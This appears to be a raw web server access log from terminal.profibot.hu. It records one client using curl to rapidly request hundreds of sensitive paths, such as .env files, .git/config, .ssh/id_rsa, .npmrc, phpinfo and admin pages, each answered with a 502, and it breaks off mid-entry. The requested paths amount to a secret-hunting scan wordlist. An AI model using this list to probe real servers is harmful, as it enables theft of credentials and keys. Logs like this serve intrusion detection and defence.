"/.env.hide" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.key" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.mail" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.smtp" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.swp" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:10 +0000] - - 502 - GET https terminal.profibot.hu "/.env.testing" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.env.uat" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.env_aws" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.env_backup" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.env_copy" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.env_private" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.env_secret" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.env~" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.git/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.git/config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.github/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.github/workflows/*.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.gitignore" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.gitlab-ci.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.gitlab-ci/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.gitlab/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.hg/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.htaccess" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.idea/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.next/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.npmrc" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.nuxt/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.output/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.phpinfo" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.production" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.pypirc" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.remote" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.ssh/id_rsa" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.ssh/id_rsa.pub" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.svn/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.travis.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.vite/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.vscode/settings.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.well-known/openid-configuration" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/.well-known/security.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:11 +0000] - - 502 - GET https terminal.profibot.hu "/07-accessing-data/begin/vue-heroes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/07-accessing-data/end/vue-heroes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/08-routing/begin/vue-heroes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/08-routing/end/vue-heroes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/09-managing-state/begin/vue-heroes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/09-managing-state/end/vue-heroes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/123.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/3-sequelize/final/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/31_structure_tests/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/?p=info" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/?p=php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/?phpinfo" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/?phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/?phpinfo=1" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/?q=info" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/__debug__" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/__debugbar" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/__tests__/test-become/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_astro/[chunk-name].[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_dev" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_ignition/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/945-34f67d7c0866cf61b970.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/app/%5B...not-found%5D/page-63e952e68a371605.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/app/error.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/app/global-error.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/app/layout-a908fe02173ed4b1.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/framework-[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/main-app-[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/pages/_app-a9fba37d935ce3f3.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/pages/_app-d1b5411bacd03f02.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/pages/_app-d25b242610000153a081.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_next/static/chunks/webpack-[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/_static/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/a.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/acme-challenge/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/acme/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:12 +0000] - - 502 - GET https terminal.profibot.hu "/acme_challenges/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/actions-server/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/actuator/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/admin-api/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/admin-app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/admin-panel/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/admin.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/admin/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/admin/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/adminapp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/adminer.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/adminer/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/administrator/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/adminphp.php'" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/agora/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/alpha/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/anaconda/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/apache.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/apache/i.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/apache/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/apache/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/apache2.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/apc.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api-server/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/.env.back" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/.env.example" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/.env.sample" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/.env.save" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/debug" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/docs/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/internal/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/keys" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/private/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:13 +0000] - - 502 - GET https terminal.profibot.hu "/api/src/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/api/v1/debug" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/api/v2/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/apis/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app-7d66de919618d3830635.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app-order-client/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app.yaml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app/.env.example" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app/.env.sample" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app/.env.save" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app//.env.back" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app/client/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app/code/community/Nosto/Tagging/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app/config.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app/config/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app/config/dev/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app/frontend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app/info" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app/info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app1-static/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app2-static/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app_dir/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/app_nginx_static_path/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/application/.env.sample" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/application/.env.save" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/apps/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/apps/client/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/Archipel/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/asdf.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/asset_img/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/assets/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/assets/index-[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/assets/index-[hash].mjs" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/assets/index-GquDNGwd.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:14 +0000] - - 502 - GET https terminal.profibot.hu "/assets/js/app.f8ec9fb3.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to 